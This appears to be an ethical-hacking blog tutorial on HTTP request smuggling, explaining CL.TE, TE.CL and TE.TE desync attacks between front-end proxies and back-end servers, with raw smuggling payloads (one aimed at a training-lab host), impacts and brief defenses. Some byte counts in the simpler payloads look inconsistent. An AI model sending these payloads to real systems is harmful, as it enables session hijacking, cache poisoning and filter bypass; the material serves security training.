All Vulnerabilities For VAPT (Ethical Hacking)

on

Advance Topics

HTTP REQUEST SMUGGLING 

HTTP REQUEST SMUGGLING  
ATTACKS  


1.1 WHAT IS HTTP REQUEST SMUGGLING?

HTTP Request Smuggling is when:
● There are two servers (front-end + back-end)  
● They read the same HTTP request differently  
● Because of that, you hide one request inside another  

That hidden request is called smuggled request.

1.2 WHY TWO SERVERS EXIST

Most real websites look like this:  
You → Front-end (proxy/WAF) → Back-end (app)

Front-end server
● Blocks bad stuff
● Allows only GET / POST
● Forwards requests

Back-end server
● Runs the app
● Talks to DB
● Trusts front-end

1.3 THE CORE PROBLEM

In HTTP/1, there are TWO ways to say where the request body ends:

1️⃣ Content-Length: 10  
➡ Read exactly 10 bytes  
2️⃣ Transfer-Encoding: chunked  
➡ Read chunks until you see 0

THE BUG

If:  
● Front-end trusts Content-Length  
● Back-end trusts Transfer-Encoding  
OR vice versa…

➡ They desync  
➡ Extra data becomes new request  
➡ You win ๐Ÿ˜ˆ

1.4 TYPES OF HTTP REQUEST SMUGGLING

There are 3 main types.

1️⃣ **CL.TE (Content-Length vs Transfer-Encoding)**

Who trusts what  
● Front-end → Content-Length  
● Back-end → Transfer-Encoding

๐Ÿงพ PAYLOAD (CL.TE)

POST / HTTP/1.1
Host: target.com
Content-Length: 10
Transfer-Encoding: chunked
0
GPOST


WHAT HAPPENS  
Front-end:  
● Reads 10 bytes  
● Thinks request is finished  
● Forwards everything

Back-end:  
● Sees Transfer-Encoding: chunked  
● Sees 0 → body finished  
● Treats GPOST as new request  
๐Ÿ”ฅ Smuggling done

2️⃣ **TE.CL (Transfer-Encoding vs Content-Length)**

Who trusts what  
● Front-end → Transfer-Encoding  
● Back-end → Content-Length

๐Ÿงพ PAYLOAD (TE.CL)

POST / HTTP/1.1
Host: target.com
Content-Length: 3
Transfer-Encoding: chunked
8
GPOST123
0


๐Ÿซ WHAT HAPPENS  
Front-end:  
● Reads chunked body  
● Stops at 0

Back-end:  
● Reads only 3 bytes (GPO)  
● Remaining data becomes new request  
๐Ÿ”ฅ Smuggling done

3️⃣ **TE.TE (Duplicate Transfer-Encoding)**

This is the advanced one.

WHY TE.TE WORKS  
You send two Transfer-Encoding headers.  
Each server picks a different one.

๐Ÿงพ FULL PAYLOAD (TE.TE LAB)

POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0


⚠️ Send this TWICE

๐Ÿซ FRONT-END THINKING  
● Sees Transfer-Encoding: cow  
● Doesn’t understand it  
● Ignores chunked  
● Uses Content-Length: 4  
So it reads only:  
5c\r\n  
Then forwards EVERYTHING.

๐Ÿซ BACK-END THINKING  
● Sees Transfer-Encoding: chunked  
● Ignores cow  
● Reads chunk size:  
5c (hex) = 92 bytes  
So it reads next 92 bytes as body:  
GPOST / HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 15  
x=1  
Then sees:  
0End of body

๐Ÿ”ฅ A FULL REQUEST GOT HIDDEN

WHAT IS x=1?  
● Dummy POST data  
● Makes request valid  
● Matches Content-Length

WHAT IS 0?  
● End of chunked body  
● REQUIRED

WHY 5c?  
● 5c = 92 bytes  
● Exactly matches smuggled request size  
● You can use 6c, 7a, etc ONLY if size matches

WHY SEND REQUEST TWICE?  
● First request → hides smuggled request  
● Second request → triggers execution

1.5 REAL-WORLD IMPACT  
HTTP Request Smuggling can lead to:
● Account Takeover  
● Session hijacking  
● Cache poisoning  
● Admin access  
● WAF bypass  
Severity: CRITICAL

๐Ÿง  Quick Summary — What HTTP Request Smuggling Is

HTTP request smuggling is a web security vulnerability that exploits differences in how front-end (proxy/WAF) and back-end servers parse HTTP requests — especially when Content-Length and Transfer-Encoding headers coexist.

If these two servers don’t agree on where one request ends and the next begins, an attacker can sneak (“smuggle”) a hidden HTTP request inside the next request.

๐Ÿ” Why It Happens (Technical Cause)

The core issue arises because HTTP/1.1 allows two different ways to determine the end of the body:

  • Content-Length: declares exact bytes.

  • Transfer-Encoding: chunked: sends chunks until a zero-size chunk.

If one server trusts one header and another trusts the other, they desynchronize — creating ambiguity.

๐Ÿงช Popular Attack Types

  1. CL.TE – Front-end uses Content-Length, back-end uses Transfer-Encoding.

  2. TE.CL – Front-end uses Transfer-Encoding, back-end uses Content-Length.

  3. TE.TE – Both use Transfer-Encoding, but one server ignores/handles differently due to duplicate or malformed headers.

๐Ÿšจ Real-World Impacts

HTTP request smuggling can enable:

  • Session hijacking

  • Bypassing security filters (WAF/proxies)

  • Cache poisoning

  • Unauthorized admin access

  • Account takeovers
    (Critical severity in most cases)

๐Ÿ›ก️ How To Defend Against It

General prevention strategies include:

  • Ensure consistent request handling across servers.

  • Use HTTP/2 end-to-end (reduces ambiguity).

  • Reject malformed or ambiguous requests at the edge.

  • Disable unnecessary legacy parsing features if possible.


Comments

Post a Comment